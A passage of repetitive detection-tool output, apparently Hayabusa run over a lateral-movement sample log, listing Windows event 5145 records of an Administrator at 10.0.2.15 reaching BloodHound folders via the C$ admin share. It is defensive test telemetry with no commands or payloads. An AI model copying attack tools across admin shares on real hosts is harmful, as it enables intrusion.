Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 